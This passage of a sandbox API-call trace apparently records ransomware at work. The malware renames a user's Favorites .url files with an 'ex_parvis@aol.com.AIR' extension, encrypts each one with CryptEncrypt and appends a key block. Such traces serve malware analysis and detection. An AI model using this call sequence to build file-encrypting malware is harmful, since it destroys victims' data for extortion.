(lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn entertainment.url.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x554 [0167.520] GetProcessHeap () returned 0x2e0000 [0167.520] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363b58 | out: hHeap=0x2e0000) returned 1 [0167.520] GetFileSizeEx (in: hFile=0x554, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=133) returned 1 [0167.520] SetFilePointer (in: hFile=0x554, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x85 [0167.521] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0167.521] GetProcessHeap () returned 0x2e0000 [0167.521] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0167.521] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0167.521] WriteFile (in: hFile=0x554, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0167.522] WriteFile (in: hFile=0x554, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0167.522] WriteFile (in: hFile=0x554, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0167.522] ReadFile (in: hFile=0x554, lpBuffer=0x31f5f0, nNumberOfBytesToRead=0x85, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x31f5f0*, lpNumberOfBytesRead=0x2acf9c8*=0x85, lpOverlapped=0x0) returned 1 [0167.522] SetFilePointer (in: hFile=0x554, lDistanceToMove=-133, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.522] WriteFile (in: hFile=0x554, lpBuffer=0x336dd8*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x336dd8*, lpNumberOfBytesWritten=0x2acf9c8*=0x85, lpOverlapped=0x0) returned 1 [0167.523] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0167.523] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0167.523] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url", dwFileAttributes=0x80) returned 1 [0167.523] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url") returned 67 [0167.523] GetProcessHeap () returned 0x2e0000 [0167.523] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xec) returned 0x336dd8 [0167.523] lstrcpyW (in: lpString1=0x336dd8, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url" [0167.523] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url.12781717671972518758.ex_parvis@aol.com.AIR" [0167.523] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn autos.url"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn autos.url.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0167.525] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn autos.url.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x554 [0167.525] GetProcessHeap () returned 0x2e0000 [0167.526] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x336dd8 | out: hHeap=0x2e0000) returned 1 [0167.526] GetFileSizeEx (in: hFile=0x554, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=133) returned 1 [0167.526] SetFilePointer (in: hFile=0x554, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x85 [0167.526] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0167.526] GetProcessHeap () returned 0x2e0000 [0167.526] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0167.526] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0167.526] WriteFile (in: hFile=0x554, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0167.527] WriteFile (in: hFile=0x554, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0167.527] WriteFile (in: hFile=0x554, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0167.527] ReadFile (in: hFile=0x554, lpBuffer=0x336dd8, nNumberOfBytesToRead=0x85, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x336dd8*, lpNumberOfBytesRead=0x2acf9c8*=0x85, lpOverlapped=0x0) returned 1 [0167.527] SetFilePointer (in: hFile=0x554, lDistanceToMove=-133, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.527] WriteFile (in: hFile=0x554, lpBuffer=0x336e68*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x336e68*, lpNumberOfBytesWritten=0x2acf9c8*=0x85, lpOverlapped=0x0) returned 1 [0167.528] FindFirstFileW (in: lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb163f970, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0xb163f970, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3b19a8 [0167.528] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0167.528] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0167.528] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url", dwFileAttributes=0x80) returned 1 [0167.529] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url") returned 77 [0167.529] GetProcessHeap () returned 0x2e0000 [0167.529] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363b58 [0167.529] lstrcpyW (in: lpString1=0x363b58, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url" [0167.529] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url.12781717671972518758.ex_parvis@aol.com.AIR" [0167.529] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live spaces.url"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live spaces.url.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0167.532] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live spaces.url.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x558 [0167.532] GetProcessHeap () returned 0x2e0000 [0167.532] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363b58 | out: hHeap=0x2e0000) returned 1 [0167.533] GetFileSizeEx (in: hFile=0x558, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=133) returned 1 [0167.533] SetFilePointer (in: hFile=0x558, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x85 [0167.533] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0167.533] GetProcessHeap () returned 0x2e0000 [0167.533] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0167.533] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0167.533] WriteFile (in: hFile=0x558, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0167.534] WriteFile (in: hFile=0x558, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0167.534] WriteFile (in: hFile=0x558, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0167.535] ReadFile (in: hFile=0x558, lpBuffer=0x312a78, nNumberOfBytesToRead=0x85, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x312a78*, lpNumberOfBytesRead=0x2acf9c8*=0x85, lpOverlapped=0x0) returned 1 [0167.535] SetFilePointer (in: hFile=0x558, lDistanceToMove=-133, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.535] WriteFile (in: hFile=0x558, lpBuffer=0x31f5f0*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x31f5f0*, lpNumberOfBytesWritten=0x2acf9c8*=0x85, lpOverlapped=0x0) returned 1 [0167.535] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0167.535] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0167.535] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url", dwFileAttributes=0x80) returned 1 [0167.536] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url") returned 75 [0167.536] GetProcessHeap () returned 0x2e0000 [0167.536] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xfc) returned 0x363b58 [0167.536] lstrcpyW (in: lpString1=0x363b58, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url" [0167.536] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url.12781717671972518758.ex_parvis@aol.com.AIR" [0167.536] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live mail.url"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live mail.url.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0167.538] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live mail.url.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x558 [0167.539] GetProcessHeap () returned 0x2e0000 [0167.539] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363b58 | out: hHeap=0x2e0000) returned 1 [0167.539] GetFileSizeEx (in: hFile=0x558, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=133) returned 1 [0167.539] SetFilePointer (in: hFile=0x558, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x85 [0167.539] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0167.539] GetProcessHeap () returned 0x2e0000 [0167.539] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0167.539] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0167.539] WriteFile (in: hFile=0x558, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0167.540] WriteFile (in: hFile=0x558, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0167.540] WriteFile (in: hFile=0x558, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0167.540] ReadFile (in: hFile=0x558, lpBuffer=0x312a78, nNumberOfBytesToRead=0x85, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x312a78*, lpNumberOfBytesRead=0x2acf9c8*=0x85, lpOverlapped=0x0) returned 1 [0167.540] SetFilePointer (in: hFile=0x558, lDistanceToMove=-133, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.540] WriteFile (in: hFile=0x558, lpBuffer=0x31f5f0*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x31f5f0*, lpNumberOfBytesWritten=0x2acf9c8*=0x85, lpOverlapped=0x0) returned 1 [0167.541] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0167.541] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0167.541] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url", dwFileAttributes=0x80) returned 1 [0167.541] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url") returned 78 [0167.541] GetProcessHeap () returned 0x2e0000 [0167.541] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x102) returned 0x336dd8 [0167.541] lstrcpyW (in: lpString1=0x336dd8, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url" [0167.541] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url.12781717671972518758.ex_parvis@aol.com.AIR" [0167.541] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live gallery.url"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live gallery.url.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0167.544] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live gallery.url.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x558 [0167.545] GetProcessHeap () returned 0x2e0000 [0167.545] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x336dd8 | out: hHeap=0x2e0000) returned 1 [0167.545] GetFileSizeEx (in: hFile=0x558, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=133) returned 1 [0167.545] SetFilePointer (in: hFile=0x558, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x85 [0167.545] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0167.545] GetProcessHeap () returned 0x2e0000 [0167.545] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0167.545] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0167.545] WriteFile (in: hFile=0x558, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0167.546] WriteFile (in: hFile=0x558, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0167.546] WriteFile (in: hFile=0x558, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0167.546] ReadFile (in: hFile=0x558, lpBuffer=0x312a78, nNumberOfBytesToRead=0x85, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x312a78*, lpNumberOfBytesRead=0x2acf9c8*=0x85, lpOverlapped=0x0) returned 1 [0167.547] SetFilePointer (in: hFile=0x558, lDistanceToMove=-133, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0167.547] WriteFile (in: hFile=0x558, lpBuffer=0x31f5f0*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x31f5f0*, lpNumberOfBytesWritten=0x2acf9c8*=0x85, lpOverlapped=0x0) returned 1 [0167.547] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0167.547] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0167.547] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url", dwFileAttributes=0x80) returned 1 [0167.548] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url") returned 74 [0167.548] GetProcessHeap () returned 0x2e0000 [0167.548] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xfa) returned 0x363b58 [0167.548] lstrcpyW (in: lpString1=0x363b58, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url" [0167.548] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url.12781717671972518758.ex_parvis@aol.com.AIR" [0167.548] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\get windows live.url"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\get windows live.url.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0167.552] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\get windows live.url.12781717671972518758.ex_parvis@aol.com.air"), 